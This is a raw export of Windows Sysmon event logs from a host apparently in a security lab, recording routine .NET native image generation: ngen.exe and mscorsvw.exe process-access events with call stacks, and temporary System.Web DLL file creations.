13:47:56.795{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BC02-00000000A301}2896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:56.749{59A5CD1D-918C-6005-BB02-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10a8-1\System.Web.Abstractions.dll2021-01-18 13:47:56.749 10341000x80000000000000006978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.717{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BB02-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.717{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BB02-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:56.717{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BB02-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.608{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BA02-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.592{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BA02-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.592{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BA02-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:56.202{59A5CD1D-9183-6005-B502-00000000A301}4656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1230-0\System.Web.dll2021-01-18 13:47:56.202 10341000x80000000000000006992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:57.264{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918D-6005-BF02-00000000A301}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:57.248{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-918D-6005-BF02-00000000A301}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:57.248{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918D-6005-BF02-00000000A301}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:57.030{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BE02-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9190-6005-C302-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.858{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9190-6005-C302-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:00.858{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9190-6005-C302-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.686{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9190-6005-C202-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.686{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9190-6005-C202-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.686{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9190-6005-C202-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:00.623{59A5CD1D-9190-6005-C102-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d58-0\System.Web.DataVisualization.Design.dll2021-01-18 13:48:00.623 10341000x80000000000000006999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.405{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9190-6005-C102-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.389{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9190-6005-C102-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:00.389{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9190-6005-C102-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.342{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9190-6005-C002-00000000A301}1580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.327{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9190-6005-C002-00000000A301}1580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.327{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9190-6005-C002-00000000A301}1580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:00.186{59A5CD1D-918D-6005-BF02-00000000A301}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1148-0\System.Web.DataVisualization.dll2021-01-18 13:48:00.186 11241100x80000000000000007011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:02.936{59A5CD1D-9192-6005-C402-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11b0-0\System.Web.DynamicData.dll2021-01-18 13:48:02.936 10341000x80000000000000007010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 